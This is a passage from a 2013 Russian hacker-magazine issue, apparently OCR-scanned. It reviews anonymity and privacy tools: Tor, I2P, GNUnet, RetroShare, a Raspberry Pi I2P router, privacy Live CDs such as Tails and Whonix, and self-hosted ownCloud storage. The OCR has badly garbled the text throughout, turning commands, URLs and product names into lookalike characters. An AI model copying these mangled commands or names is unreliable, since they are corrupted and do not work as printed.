ных разговоров и электронных сообщений по не- 
которым оценкам достигал 1,7 миллиарда в год, 
стоит серьезно задуматься над тем, как защитить 
свою частную жизнь от чужих глаз. 



ТОП 

Первая реакция на новость о РВІЗМ у многих 
была одинакова: не позволим следить за собой, 
ставим Тог. Это, пожалуй, действительно самое 
популярное средство, о котором мы не один раз 
рассказывали на страницах нашего журнала. 
Он тоже был создан американскими военными, 
правда для совсем противоположных целей. Та- 
кая вот ирония. Пользователи запускают на своей 
машине программное обеспечение Тог, работаю- 
щее как прокси, он «договаривается» с другими 
узлами сети и строит цепочку, по которой будет 
передаваться зашифрованный трафик. По ис- 
течении некоторого времени цепочка перестра- 
ивается и в ней используются уже другие узлы. 
Для сокрытия от любопытных глаз информации 
о браузере и установленной ОС Тог часто ис- 



пользуется в связке с Ргіѵоху — некеширующим 
прокси, который модифицирует НТТР-заголовки 
и веб-данные, позволяя сохранить приват- 
ность и избавиться от назойливой рекламы. 
Чтобы не лазить по конфигурационным файлам 
и не править все настройки ручками, есть за- 
мечательная 0111-оболочка — Ѵісіаііа, доступная 
для всех ОС и позволяющая за пару минут под- 
нять на своем ПК дверь в анонимный мир. Плюс 
разработчики попытались все максимально упро- 
стить, предоставляя пользователям возможность 
в один клик установить себе Тог, Ѵісіаііа и рогІаЫе- 
версию РігеТох с различными зесигііу-аддонами. 
Для безопасного общения существует децентра- 
лизованная анонимная система обмена сообще- 
ниями — ТогСНаТ Для безопасного, анонимно- 
го и прозрачного перенаправления всего ТОР/ 
ІР- и 0148-трафика через сеть анонимайзеров 
Тог служит утилита ТогѣіІІа. Программа позволяет 
анонимно запускать на компьютере под ѴѴіпсІоѵѵз 
любое программное обеспечение, даже если 
оно не поддерживает 80СК8 или НТТР-прокси, 
что раньше было практически невозможно сде- 
лать под ѴѴіпсІоѵѵз. Помимо этого, для стандарт- 
ной связки Тог + Ѵісіаііа + Ргіѵоху существует до- 
стойная альтернатива — АсІѵапсесІ Опіоп ВоіДег 
( Ьіі.Іѵ/апсХНг ). рогІаЫе- клиент для «луковой 
маршрутизации». Для тех, кто особенно обеспо- 
коен своей безопасностью, есть І_іѵе СЭ дистри- 
бутив, который «из коробки» настроен отправлять 
весь трафик через Тог, — ЬіТІѵ/еІзіНб . 

Основное предназначение Тог — это аноним- 
ный серфинг плюс возможность создания аноним- 



ХАКЕР 09 /176/ 2013 



Шапка - невидимка 



ных сервисов. Правда, за анонимность приходится 
расплачиваться скоростью. 

І2Р 

Кроме «луковой маршрутизации», есть еще 
и «чесночная», применяемая в І2Р. Тог и І2Р 
при некотором внешнем сходстве во многом ре- 
ализуют диаметрально противоположные под- 
ходы. В Тог создается цепочка из нод, по которой 
передается и принимается трафик, а в І2Р ис- 
пользуются «входящие» и «выходящие» туннели 
и таким образом запросы и ответы идут через 
разные узлы. Каждые десять минут эти туннели 
перестраиваются. «Чесночная маршрутизация» 
подразумевает, что сообщение («чеснок») может 
содержать в себе множество «зубчиков» — полно- 
стью сформированных сообщений с информаци- 
ей по их доставке. В один «чеснок» в момент его 
формирования может закладываться много «зуб- 
чиков», часть из них может быть нашими, а часть 
транзитными. Является ли тот или иной «зубчик» 
в «чесноке» нашим сообщением, или это чужое 
транзитное сообщение, которое проходит через 
нас, знает только тот, кто создал «чеснок». 

Основная задача І2Р, в отличие от Тог, — ано- 
нимный хостинг сервисов, а не предоставление 
анонимного доступа в глобальную сеть, то есть 
размещение в Сети веб-сайтов, которые в терми- 
нологии І2Р называются еерзііез. 

Для работы программного обеспечения І2Р 
необходима предустановленная баѵа. Все управ- 
ление ведется через веб-интерфейс, который 
доступен по адресу 127.0.0.1:7657. После всех 
необходимых манипуляций надо подождать пару 
минут, пока сеть настроится, и можно пользо- 
ваться всеми ее скрытыми сервисами. В данном 
случае мы получили анонимный доступ в сеть І2Р, 
то есть ко всем ресурсам в домене .І2р. Если захо- 
чется выйти в глобальную сеть, то достаточно про- 
сто прописать в настройках браузера использова- 
ние прокси-сервера 127 .0.0.1: 4444. Выход из І2Р 



в глобальную сеть осуществляется через опре- 
деленные шлюзы (называемые оиіргоху). Как по- 
нимаешь, рассчитывать на огромную скорость 
в таком случае не приходится. Плюс нет никакой 
гарантии, что на таком шлюзе никто не снифает 
твой трафик. Безопасно ли размещать свой ано- 
нимный ресурс в І2Р-сети? Ну, 100%-й гарантии 
безопасности тут никто дать не может, если ресурс 
будет банально уязвим, то не составит особого 
труда определить его истинное местоположение. 

СШЖЕТ 

А как насчет безопасного и анонимного обме- 
на файлами? Для такой цели можно прибегнуть 
к помощи СІЧІІпеІ ( Ьіі.Іѵ/ІіМпОзи ) — фреймворка 
для организации безопасной Р2Р-сети, не тре- 
бующей централизованных или любых других 
«доверенных» сервисов. Основная цель проек- 
та — создание надежной, децентрализованной 
и анонимной системы обмена информацией. Все 
узлы сети работают как маршрутизаторы, шифру- 
ют соединения с другими узлами и поддержива- 
ют постоянный уровень нагрузки на сеть. Как и во 
многих других решениях, узлы, активно участвую- 
щие в работе сети, обслуживаются с более высо- 
ким приоритетом. Для идентификации объектов 
и сервисов используется ІІРІ, который выглядит 
как §пипе1:://тосІи1е/ісІеп1:і6ег, где тосіиіе — 
имя модуля сети, а ісІепТібег — уникальный хеш, 
идентифицирующий сам объект. Интересная 
фича — возможность настроить уровень аноним- 
ности: от нуля (не анонимно) до бесконечности 
(по дефолту стоит единица). Для безопасной 
передачи все файлы шифруются с помощью 
ЕСН8 (Ап Епсосііпд іог СепзогзЫр-ВезізІапІ: 
ЗНагіпд — шифрование для устойчивого к цен- 
зуре обмена файлами). СІМІІпеІ является рас- 
ширяемым, на его основе можно строить новые 
Р2Р-приложения. Помимо файлообмена (наибо- 
лее популярного сервиса), существуют альтер- 
нативные службы: простейший чат, находящийся 



Во многих странах, таких как Китай или 
Иран, провайдеры активно борются 
против использования Тог’а, применяя 
йРІ (беер раскеі: іпзресйоп), фильтрацию 
по ключевым словам, избирательную 
блокировку и другие методы. Для того 
чтобы обойти цензуру, Іогргоіесі вы- 
пустил специальную тулзу оЬ^зргоху ( ЬИ:. 
Іѵ/24ІіиоР ). которая преобразует трафик 
между клиентом и мостом таким об- 
разом, что он выглядит для провайдера 
абсолютно безобидным. 



| [ оЬТаргоху сііепі ) | сем&оп I [ оЬГ«ргоху «егѵег | 1 

[ Тог СІІ«п1 ) | Тог Вгідд» ] 



Схема работы оЬТзргоху 



сейчас в полумертвом состоянии, а также распре- 
деленный РЫЗ. Ну и как обычно, за анонимность 
приходится расплачиваться: высокой задержкой, 
низкой скоростью работы и достаточно высоким 
потреблением ресурсов (что характерно для всех 
децентрализованных сетей). Плюс присутствуют 
проблемы обратной совместимости между раз- 
личными версиями фреймворка. 

ПЕ8ТЯ08НАПЕ 

ПезІтоЗІіаге ( ЬіТІѵ/спбРЬО — это открытая кросс- 
платформенная программа для построения де- 
централизованной сети по принципу Е2Р (Ргіепб 
То Ргіепб), использующая СРС. Основная фило- 
софия заключается в обмене файлами и обще- 
нии только с доверенными друзьями, а не со всей 
сетью, из-за чего ее часто относят к багкпеТ 





Тог Ас*іоп$ Ѵіеѵѵ Неір 
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Для установки соединения с другом пользователю 
надо сгенерировать с помощью РеІгоЗИаге пару 
СРС-ключей (или выбрать существующую). После 
проверки подлинности и обмена асимметричным 
ключом устанавливается ЗЗН-соединение, ис- 
пользующее для шифрования ОрепЗЗЬ. Друзья 
друзей могут видеть друг друга (если пользовате- 
ли включили такую возможность), но соединяться 
не могут. Такая вот получается социальная сеть :). 
Но зато можно шарить папки между друзьями. 
В сети существует несколько сервисов для обще- 
ния: приватный чат, почта, форумы (как аноним- 
ные, так и с обычной аутентификацией), голосо- 
вой чат (ѴоІР-плагин), каналы наподобие ІРС. 

ПА8РВЕННУ РІ 

Ты можешь удивиться: при чем тут ВазрЬеггу 
Рі? Мы же говорим про анонимность. А при том, 
что сей маленький девайс поможет этой аноним- 
ности добиться. Его можно использовать в каче- 
стве роутера/клиента, предоставляющего тебе 
доступ к Тог/І2Р-сетям или анонимному ѴРЫ. 
Кроме этого, есть еще один плюс. В децентрали- 
зованных сетях достигнуть приемлемой скорости 
доступа к внутрисетевым ресурсам можно, только 
если постоянно находиться в ней. Например, в І2Р 
доверие других «чесночных роутеров» к такому 
узлу будет больше, соответственно, и скорость 
выше. Держать ради этого постоянно включен- 
ным свой компьютер или заводить отдельный 
сервер нерезонно, а вот потратить на это всего 30 
долларов вроде и не жалко. 

В повседневной жизни можно будет пользо- 
ваться обычным подключением, а когда надо будет 
анонимно выйти в Сеть — просто пускаешь весь 
трафик через мини-девайс и не паришься ни с ка- 
кими настройками. 

Надо сказать, что до недавнего времени 
устанавливать софтину І2Р, написанную на Заѵа, 
на «малинку» смысла не было. Жадной до ресур- 
сов Заѵа-машине никак не хватало стандартных 
256 Мб оперативы. С выходом ВазрЬеггу Рі тосіеі 
В, несущего на борту уже 512 Мб, это стало уже 
вполне реально. Так что давай рассмотрим основ- 
ные моменты, связанные с установкой. Допустим, 
мы используем ВазрЬіап ( ЬіЫѵ/ѵз83АК ). 

Первым делом обновляемся: 

зисіо ар~Е-§е1: ирсіаііе: зисіо ар~Е-§е1: <-■ 
сіізі: - ир^гасіе 

Затем устанавливаем Заѵа, но не стандартную 
из пакетов, а специальную версию, заточенную 
под процессоры АРМ, — Ьі1:.Іѵ/13КІі9ТІ\І (как пока- 
зывает практика, стандартная сожрет всю память). 
Скачиваем и инсталлируем: 

зисіо ѣаг гхѵТ іс!к-8-еа-Ь97-<-< 
1іпих-апт-ѵ-Рр-Ы11:-03 іиі 2013 .Ііап .^2 <-■ 

-С /изг/іосаі/^аѵа 

ехрогЕ РАТН=$РАТН: /изг/ІосаІ/іаѵа/Ьіп 

После чего скачиваем и устанавливаем І2Р: 

ссі ~ 

гпксііг і2рЬіп 

ссі і2рЬіп 

м§е1: Ыііір: //шіггог.і2р2.сІе/4-< 
І2ріпз1=а11_0.9.7. ^аг 

Іаѵа -іаг І2ріпз1:а11 0.9.7. іаг -сопзоіе 

Чтобы превратить ВазрЬеггу в роутер для І2Р, 
надо немного поколдовать с конфигами. Пере- 
ходим в ~/ . І2р и начинаем редактировать файл 
с1іеп1і5.соп1і§. Там нам надо закомментировать 
строку 



с1іеп1:Арр.0.аг^5=7657 ::1Л27. 0.0.1 <-■ 
./ыеЬаррз/ 

и раскомментировать 

с!іеп1:Арр.Ѳ.аг%5=7657 Ѳ.Ѳ.Ѳ.Ѳ <-■ 

. /ыеЬаррз/ 

А затем в файле І2р1:иппе1 . соп1і§ заменить адреса 
в строках 

•ЕиппеІ.Ѳ. іп1=ег-Расе=127.Ѳ.Ѳ. 1 
1=иппе1.6.іп1=ег-Расе=127.0.Ѳ.1 



на 0.0. 0.0. После чего можем запустить І2Р- 
роутер, выполнив: 

ссі ~/і2 рЬіп 

./гипрІаіп.зЬ 

Также можно добавить в сгоп1:аЬ следующие 
строки, чтобы софтина автоматически поднима- 
лась при запуске системы или после краша: 

0 * * * * /Ьоше/рі/і2рЬіп/гипр1аіп. зЬ 
@геЬоо1: /Ьоте/рі/і2рЬіп/гипр1аіп . зіі 

Осталось только организовать удаленный до- 
ступ к девайсу. Оптимальный способ — исполь- 
зовать динамический портфорвардинг через ЗЗН. 
Для этого надо только установить в настройках І2Р- 
туннель, который бы указывал на 22-й порт на ло- 
кальной машине. 



Таким же образом можно превратить Рі в ано- 
нимный ѴРЫ (как это сделать, можно посмотреть 
тут - ЬіТІѵ/1 1 Впх8Ѵ ) или подключить к Тог’у (отлич- 
ный видеомануал по этому поводу: ЬіЫѵ/12ВіОІІ9 ). 
А можно и придумать свой способ, как использо- 
вать девайс для анонимных путешествий по Сети. 

МІКНОТІК 

На самом деле ПазрЬеггу Рі не единственный 
маленький девайс, на базе которого можно ор- 
ганизовать анонимный доступ в Сеть. Достой- 
ной альтернативой ему будет роутер от лат- 
вийской компании МікгоТік (ЫЦу/щсуОК), 
которая занимается производством сетевого 
оборудования и софта для него. Такой девайс 
обойдется чуть подороже, но потребует мень- 
ше возни при настройке. В числе продуктов 
компании ВоиІегОЗ — операционная система 
на базе І_іпих, предназначенная для установ- 
ки на аппаратные маршрутизаторы МікгоТік 
ВоиІегВОАРЮ. Различные варианты платформ 
РоиіегВОАРЮ позволяют решать различные се- 
тевые задачи: от построения простой точки до- 
ступа до мощного маршрутизатора. Несмотря 
на наличие разъема для подключения питания, 
практически все устройства могут питаться 
с помощью РоЕ. Большой плюс — наличие хо- 
рошей документации ( ЫТІѵ/і5І\І4РІ_ ). в которой 
очень подробно описано, как можно создать 
зесигііу-роутер на базе Рои1:егВОАР04хх, под- 
ключив его к сети Тог. Останавливаться на этом 
не будем, здесь: Ыі.Іѵ/ІстХбхЦ все очень под- 
робно описано. 




ХАКЕР 09 /176/ 2013 



АДДОНЫ 
ДЛЯ БРАУЗЕРОВ 

Большая часть времени в Сети 
идет не на разговоры по скайпу 
или общение в социальных сетях, 
а на простой серфинг. Но и тут нас 
не оставляют без присмотра. Со- 
циальные сети и прочие сайты пы- 
таются отследить, какие ресурсы 
ты посещаешь, что ищешь в Сети, 
чтобы потом пичкать тебя рекла- 
мой по схожей тематике (стоило 
мне разок посмотреть один ноут- 
бук, как он тут же начал выскаки- 
вать повсюду в рекламе от гугла). 
Это быстро начинает раздражать 
и отвлекать от основного поиска. 
Да и вообще, мы заходим в Сеть 
не для того, чтобы показать кому- 
то, что мы ищем. Так что с этим 
надо как-то бороться. 



Оізсоппесі 

Один из лучших плагинов, позволяю- 
щий скрыться от рекламной слежки, 
доступный для браузеров РігеТох, 
СНгопле, Орега и За^агі. На офици- 
альном сайте ( ЫГІѵ/16Ы6ѵѴ\ ) можно 
посмотреть забавный анимационный 
ролик, демонстрирующий, как не- 
которые сайты следят за пользовате- 
лями и мешают им сосредоточиться 
на поиске. После установки данного 
расширения на тулбаре появит- 
ся кнопка, при клике на которую 
отобразится выпадающее окошко 
(дропдаун), и в нем будет наглядно 
показано, сколько «левых» запросов 
(от гугла, твиттера, фейсбука, анали- 
тических и рекламных сайтов) было 
заблокировано при заходе на данную 
страницу. А также на сколько удалось 
сократить время загрузки страницы 
и сколько сэкономить трафика. 

АсІЫоскРІиз 

Еще одним способом отслежива- 
ния пользователя (а также часто 
и распространения малвари) служит 
реклама. И пусть большинство бан- 
неров вполне безобидны, но согла- 
сись, что куча анимации и выскакива- 



ющие попапы не только раздражают, 
но и отвлекают внимание от искомой 
информации. Чтобы отключить 
рекламу в РігеТох, Орега и СНгопле, 
достаточно поставить расширение 
АсІЫоск РІиз ПэіГІѵ/ІЭѴѴЦГЭ ). 

ОоЫоіТгаскМе 

Альтернативой популярному 
ЭізсоппесТ также поддержива- 
ющей все популярные браузеры, 
может служить ЭоІЧоІТгаскМе ( 

). Интерфейс у обоих 
расширений очень похож. Правда, 
в отличие от более продвинутого 
конкурента, ЭоІЧоІТгаскМе предо- 
ставляет право выбора по блоки- 
ровке того или иного шпионящего 
сайта самому пользователю. Такой 
подход пригодится тем, кто хочет 
оставить все как есть, заблокиро- 
вав лишь некоторых нарушителей. 

СНозіегу 

Еще одно расширение, позво- 
ляющее блокировать ресурсы, 
пытающиеся отслеживать твое 
местоположение в Сети. Обладает 
большой базой шпионящих сайтов. 
В отличие от коллег по цеху, под- 



держивает ІЕ. К сожалению, плагин 
хоть и работоспособный, но дав- 
ненько не обновлялся. Скачать 
можно на официальном сайте ( 

І У/Р2к ). 

ѴРЫ 

Говоря про приватность и ано- 
нимность в Сети, нельзя обойти 
стороной использование для этих 
целей ѴРІЧ. Мы уже рассказывали, 
как замутить свой ѴРІЧ-сервер 
в облаке Атагоп’а ( ЬіГІѵ/16Е8птЛ . 
подробно рассматривали установку 
и тонкую настройку ОрепѴРЫ ( 

ІМ). Всю необходимую 
теорию ты можешь посмотреть 
в этих статьях. Однако хочется еще 
раз напомнить, что ѴРЫ не панацея. 
Во-первых, возможны ситуации, 
когда трафик может «утечь» мимо 
ѴРІЧ-соединения, во-вторых, в се- 
тях, основанных на протоколе РРТР, 
существует реальная возможность 
расшифровать перехваченные 
данные («Такой небезопасный 
ѴРІЧ», ][акер № 170). Так что не сто- 
ит верить в полную безопасность 
при использовании виртуальных 
частных сетей. 




МікгоТік 

РоШегВОАРй 

РВ411АР 



ПОДВОДЯ итоги 

Это лишь наиболее популярные решения, позволяющие хоть как-то оградить свою частную жизнь 
от любопытных глаз Большого Брата. Возможно, в недалеком будущем появятся новые технологии 
или все мы будем активно пользоваться одной из рассмотренных сегодня. Кто знает... Что бы это 
ни было, важно всегда помнить, что никогда ни одно решение неспособно дать 100%-ю гарантию 
защищенности. Поэтому не думай, что ты в полной безопасности, установив Тог, І2Р или что-то 
еще, — за чувство ложной безопасности многие уже поплатились. Ш-П 



Схема организации 
анонимного доступа 
в интернет при помощи 
Тоги МікгоТік 
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ОБЗОР ЫѴЕ СО, ОБЕСПЕЧИВАЮЩИХ 
ШИФРОВАНИЕ ПОЛЬЗОВАТЕЛЬСКОЙ 
ИНФОРМАЦИИ И АНОНИМНОСТЬ 
ПРЕБЫВАНИЯ В СЕТИ 



Среди великого множества дистрибу- 
тивов Ыпих существуют проекты, зато- 
ченные на обеспечение защиты личных 
данных, приватности интернет-серфинга 
и безопасности переписки. Некоторые 
из них могут устанавливаться на жесткий 
диск, но в основном они предназначены 
для запуска с Ыѵе СЭ / І_іѵе 115В. Это удоб- 
но в тех случаях, когда требуется быстро 
развернуть среду для приватной работы 
на чужом компьютере. Джентльменский 



набор подобных дистрибутивов, как пра- 
вило, включает в себя: 

• Тог — без него никуда; 

• І2Р — анонимный интернет; 

• средства шифрования ІМ-переписки. 

Многие из этих дистрибутивов постро- 
ены на основе НагсіепесІ Сепіюо, поскольку 
он содержит в себе улучшенные средства 
защиты от эксплойтов, такие как РаХ, и не- 
требователен к системным ресурсам. 




ТАІІ.З 
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Разработчик: Таііз 
Лицензия: ОМСРЬ 

Системные требования: РСсЦЗВ/ОѴО, 1 Гб ОЗУ 
Русификация интерфейса: да 

Таііз расшифровывается какТІіе Атпезіс Іпсодпіію 
Ыѵе Зузіют, это потомок Іпсодпіію Ыпих, однако 
в отличие от прародителя он основан на ЭеЬіап. 
Главные возможности версии 0.19: 

• ядро 3.9.1; 

• СІЧОМЕ2; 

• Тог/І2Р; 

• браузер сконфигурирован с ЗЗІ_ по умолча- 
нию, весь трафик идет через Тог, небезопас- 
ные соединения необходимо устанавливать 
в ІІпзаТеѴѴеЬ Вгоѵѵзег. 

Также имеется интересная возможность — 
маскировка под ѴѴіпсІоѵѵз ХР. От внимательного 
взгляда она, разумеется, не скроет, но для интер- 
нет-кафе ее вполне достаточно. При завершении 
работы содержимое памяти перезаписывается 
нулями. 



Разработчик: Махіт Каттегег 
Лицензия: ОМСРЬ 

Системные требования: РС с ІІЗВ/0Ѵ0, 1 Гб ОЗУ 
Русификация интерфейса: да 

□ЬеПе основан на Сепіюо, точнее, на его 
НагсІепесІ-версии. Соответственно, защита про- 
тив эксплойтов включена по дефолту. Список ПО: 

• ядро 3.4.7; 

• І_ХЭЕ/ОрепЬох; 

• Тог; 

• виртуальная клавиатура РІогепсе. 

К сожалению, удобный интерфейс к І2Р отсут- 
ствует. Одна из изюминок дистрибутива — СаЫез 
сотплипісайоп, который позволяет анонимно об- 
мениваться сообщениями на манер электронной 
почты. Для этого используется тот же почтовый 
клиент, что и для обычной почты, — СІаѵѵз-МаіІ. 

Так же, как и в Таііз, организована очистка опе- 
ративной памяти. Если быть точным, эта функция 
впервые появилась именно здесь, а Таііз подхва- 
тил идею и реализовал ее у себя. 



Разработчик: О’УоиѵіІІе СоМеде 
Лицензия: СГШСРЬ 

Системные требования: РС с ІІЗВ/0Ѵ0, 4 Гб ОЗУ 
Русификация интерфейса: нет 

Базовая идея этого, основанного опять же 
на НагсіепесІ Сепіюо дистрибутива заключается 
в использовании везде, где только возможно, 
ІтрТз, поэтому он требователен к памяти. Загру- 
жается с ЭѴЭ, но не является Ыѵе-дистрибутивом 
в современном понимании — при загрузке он всю 
корневую ФС грузит в память, что занимает ощу- 
тимое время (примерно пять минут), и при этом 
шифрует. Таким образом, хоть ключ физически 
и хранится в той же памяти, его еще надо найти, 
а для этого нужно специальное оборудование. 

Если нужно сохранять данные, для шифрова- 
ния используется Іоор-аез, поскольку после него 
зашифрованные данные не отличить от случайно- 
го шума (нельзя не учитывать, что у ІМ5А, по слу- 
хам, больше возможностей для криптоанализа). 

Ядро в Тіп Наі: монолитное, поэтому внедрить 
код в нулевое кольцо сложнее. 



БЕЗОПАСНОСТЬ 



ФУНКЦИОНАЛЬНОСТЬ 



9/10 



9/10 



БЕЗОПАСНОСТЬ 



ФУНКЦИОНАЛЬНОСТЬ 



ПРОСТОТА ИСПОЛЬЗОВАНИЯ 



10/10 



БЕЗОПАСНОСТЬ 



ФУНКЦИОНАЛЬНОСТЬ 



ПРОСТОТА ИСПОЛЬЗОВАНИЯ 



10/10 



8/10 



ПРОСТОТА ИСПОЛЬЗОВАНИЯ 



10/10 



7/10 



8/10 


















ХАКЕР 09 /176/ 2013 



Меня зовут Никто 



гі 




РгеатРІид — компьютер, 
на котором работает РгеесІотВох 



РПЕЕООМВОХ 

ТгѳѳсІотЬохТоипсІаІіоп.ога 

Разработчик: РгеесІотВох Роипсіаііоп 
Лицензия: СМ СРІ. 

Системные требования: РІид-компьютер 
(например, ВазрЬеггуРі) 

Русификация интерфейса: нет 

Это довольно перспективная разработка. Ее идея 
заключается в создании мини-сервера, который 
можно легко унести в кармане. На этом мини-сер- 
вере будет установлено ПО, позволяющее, к при- 
меру, создать ячеистую сеть, объединяющую 



несколько таких устройств. По замыслам раз- 
работчиков, это должно позволить создать «сво- 
бодное облако». Впрочем, РгеесІотВох направлен 
также на обход цензуры в тех странах, где она есть 
или скоро появится. 

Тем не менее не все так радужно. Проект, по- 
хоже, тихо глохнет из-за отсутствия разработчи- 
ков и малого финансирования... 
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ПОМНИ: ДИСТРИБУТИВЫ І.Р8 НЕ ПРЕДНАЗНАЧЕНЫ ДЛЯ АНОНИМНОГО СЕРФИНГА. 
СКОРЕЕ, ОНИ ПОДХОДЯТ ДЛЯ БЕЗОПАСНОГО ОНЛАЙН-БАНКИНГА 




многих 



Разработчик: шііопіх.огд 
Лицензия: СМСРЬ 

Системные требования: РС с установленным ѴігіиаІВох, 

2 Гб ОЗУ, 10 Гб дискового пространства 
Русификация интерфейса: можно поставить 
соответствующие пакеты 

Отличие ѴѴИопіх от других анонимных дистрибу- 
тивов — разделение его на две части: ѴѴІіопіх- 
Саіеѵѵау и ѴѴНопіх-ѴѴогкзІаІіоп. Первая позволяет 
анонимизировать весь трафик, идущий на второй 
или с него. Это позволяет избежать многих уте- 
чек, таких как утечка реального ІР через Зкуре/ 
ТНипсІегЬігсІ/РІазІі-приложения, по той простой 
причине, что реальный ІР им недоступен. Под- 
держивается также и тарификация ѴѴіпсІоѵѵз — 
как, впрочем, и любой другой ОС; тем не менее 
для пущей анонимности рекомендуется исполь- 
зовать ѴѴИоп іх-\Л/огкз1:а1:іоп . 

Основаны обе части на ОеЫап, соответствен- 
но, проблем с настройкой возникнуть не должно. 
В качестве рабочего стола используется КРЕ. 




«ІОЫОО ЫѴЕ-СО/ОѴО 

ЬИ.Іѵ/ЦрЗНЭУ 

Разработчик: ,Іоп0о5 СтЬН 
Лицензия: СМСРЬ 

Системные требования: РСсОѴО/ЦЗВ, 1 Гб ОЗУ 
Русификация интерфейса: нет 

Этот Ыѵе-дистрибутив создан на основе ОеЫап 
(удивительно, но на этот раз не Сепіоо) и ХТсе. 
Стоит отметить две самые интересные особен- 
ности: 

• анонимайзер чЪпОопут, действующий ана- 
логично Тог. Премиум-аккаунт платный, вы- 
ходных узлов не так уж и много. Единственное 
преимущество платных аккаунтов по сравне- 
нию с Тог — заявленная скорость. 

• МіхМазІег — ПО, позволяющее анонимно пе- 
ресылать етаіі. Вкратце принцип его действия 
таков: письмо направляется конечному адре- 
сату не напрямую, а через гетаііег; возможен 
также их каскад. 

На І_іѵе ЭѴЭ есть весь необходимый софт, 
включая иЬгеОТСюе, Сітр и прочее. 




ПРОЗЕ (І.Р8) 

зрШоб.тіІ/Іірозе.Ніт 

Разработчик: ЦЗ ОоЭ 
Лицензия: закрытая 

Системные требования: РСсЦЗВ/ОѴО, 1 Гб ОЗУ 
Русификация интерфейса: нет 

Этот дистрибутив разработан Минобороны 
США для своих нужд. Цель его разработки — соз- 
дать безопасную среду для коммуникаций. Суще- 
ствует три версии данного дистрибутива: 

• І_Р5-РиЫіс включает в себя Рігейэх с РІазИ, ^ѵа 
и с поддержкой смарт-карт (САС и РІУ) для до- 
ступа американских чиновников к закрытым 
правительственным сайтам из дома; 

• І_Р5-РиЫіс Эеіихе включает ЫЬгеО^ісе и АбоЬе 
Реабег для документов с цифровой подписью; 

• І_Р5-Вепло1:е Ассезз предназначен для вну- 
треннего использования. Судя по всему, 
включает в себя ѴРЫ -клиент. 

Эти дистрибутивы не предназначены для ано- 
нимного серфинга. Скорее, они подходят для без- 
опасного онлайн-банкинга. 
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Т*»й»ик 
обла« 



Статья ^ 
из рубрики ^ 
ЗУ И/ АС К ^ 



ПОДНИМАЕМ СЕРВИС 
ДЛЯ ХРАНЕНИЯ 
И СИНХРОНИЗАЦИИ 
КОНФИДЕНЦИАЛЬНЫХ 
ДАННЫХ 



Сегодня возможности ЫР5, 5МВ/СІР5, РТР уже 
не удовлетворяют требования пользователей, по- 
этому все более популярными становятся онлай- 
новые сервисы вроде ОгорЬох. Они имеют простой 
интерфейс и удобны в работе, но вместе с тем 
не гарантируют приватность размещаемых данных. 
Чтобы обеспечить максимальную безопасность 
информации, мы рекомендуем использовать свой 
собственный облачный сервер. 



Сергей Яремчук 
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Тайник в облаках 



ОѴѴЫСЮІЮ 

Наверное, самый популярный проект, позволяющий организо- 
вать собственное хранилище файлов для обмена данными меж- 
ду пользователями. Причем по возможностям он давно обогнал 
йгорбох, поскольку кроме шаринга пользователь получает еще 
календарь, закладки, адресную книгу (с группировкой по кате- 
гориям), список дел ТОРО и так далее. Реализовано шифро- 
вание файлов, после активации данной возможности инфор- 
мацию не может просмотреть даже администратор. Возможен 
контроль версий файлов (в качестве бэкенда используется СИ;, 
при нехватке пространства старые редакции автоматически 
удаляются), установка квот и ограничений на максимальный 
размер файлов. Корзина позволяет восстанавливать файлы 
и каталоги, удаленные через веб-интерфейс. Пользователь 
может просматривать РРР- и ОБР-файлы, рисунки в фотога- 
лерее, прослушивать музыку. Предусмотрено редактирование 
текстовых файлов при помощи онлайн-редактора. Доступна 
синхронизация файлов, календаря и адресной книги с мобиль- 
ным устройством или ПК и с другими системами, поддержи- 
вающими протокол гетоІеЗІогаде. Система полнотекстового 
поиска, основанная на движке АрасИе І_исепе, позволяет искать 
не только по именам файлов, но и по их содержимому. 

Базовые возможности легко расширить при помощи плаги- 
нов, часть из них предоставляется самим проектом, доступны 
разработки третьих сторон. Большую коллекцию плагинов мож- 
но найти в репозитории ( аооз.оѵѵпсіоисі.сопп ). Здесь находим 
модуль, проверяющий сохраняемые файлы на наличие вирусов 
(с помощью СІатАѴ), модуль для организации музыкального 
сервера, позволяющий прослушивать музыкальную коллекцию 
с любого устройства в сети, хранилище подкастов и видеоро- 
ликов с доступом через веб-интерфейс или медиаплеер. Таким 
же образом добавляется поддержка ОрепЮ и ШАР, а также ра- 
бота с внешними хранилищами БгорЬох, ЗѵѵіТІ:, РТР, ЗРТР, Соодіе 
Босз, ЗЗиѴѴеЬБАѴ. 

Доступ к данным предоставляется как для зарегистри- 
рованных на сервере пользователей оѵѵпСІоисІ (помечаются 
как общие/ЗИагесІ), так и без регистрации для анонимного по- 
сетителя (в виде прямой ссылки). Реализована возможность 
отправки уведомлений другим пользователям через стандарт- 
ный механизм нотификации КБЕ (Ореп СоІІаЬогаІіоп Зегѵісез 
АРІ, изначально проект развивался под эгидой КБЕ). 

Для доступа используется веб-браузер или ѴѴеЬБАѴ, КБЕ 
КІО-ЗІаѵез, при помощи которых можно подключить хранилище 
в виде сетевого диска. Интерфейс системы локализован и орга- 
низован логично и просто, поэтому с его освоением не должно 
возникнуть проблем у пользователя с любым уровнем подго- 
товки. Разработаны клиенты оѵѵпСІоисІ Безкіюр СІіепІ: и МоЬіІе 
Сііепіз, позволяющие синхронизировать данные с настольной 
системой под управлением ѴѴіпсІоѵѵз, Ыпихи 08 X либо мобиль- 
ным устройством АпсІгоісІ (доступен в двух версиях — платной 
и бесплатной) или ЮЗ (іРИопе/іРасІ/іРосІ). Кроме этого, в ин- 
тернете можно найти большое количество расширений и при- 
ложений Арр Зіюге, позволяющих сделать работу с оѵѵпСІоисІ 
еще более удобной. Например, для файловых менеджеров 
БоІрИіп, ІМаиІіІиз, Ріпсіег и Ехріогег доступны модули интеграции 
с оѵѵпСІоисІ. 
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ДОБАВЛЯЕМ ВТОРОЙ УРОВЕНЬ 
ШИФРОВАНИЯ 



Все публичные облачные хранилища шифруют информацию, но, например, 
в случае с БгорЬох или ЗкуБгіѵе администраторы могут ее просмотреть. По- 
этому если мы хотим сохранить конфиденциальность данных, лучшим спо- 
собом будет их предварительное шифрование перед отправкой на сервер. 
Для этого можно использовать любую программу с нужной функцией, вроде 
ТгиеСгурІ: ( ), но это неудобно. Выручают специализированные 

решения: 

• Ѵііѵо ( ) (ранее ЗесгеіЗупс) обеспечивает простой способ 

для шифрования локальной папки перед отправкой на БгорЬох. После 
установки программы создается новый каталог, и все, что в него копиру- 
ется, автоматически шифруется (АЕ5-256) и синхронизируется с БгорЬох. 
Бесплатен для персонального и коммерческого использования. Доступны 
клиенты для ѴѴіпсІоѵѵз, 05 X, ЮЗ и АпсІгоісІ. 

• Вохсгуріог ( ) работает по принципу, схожему с БгорЬох, 

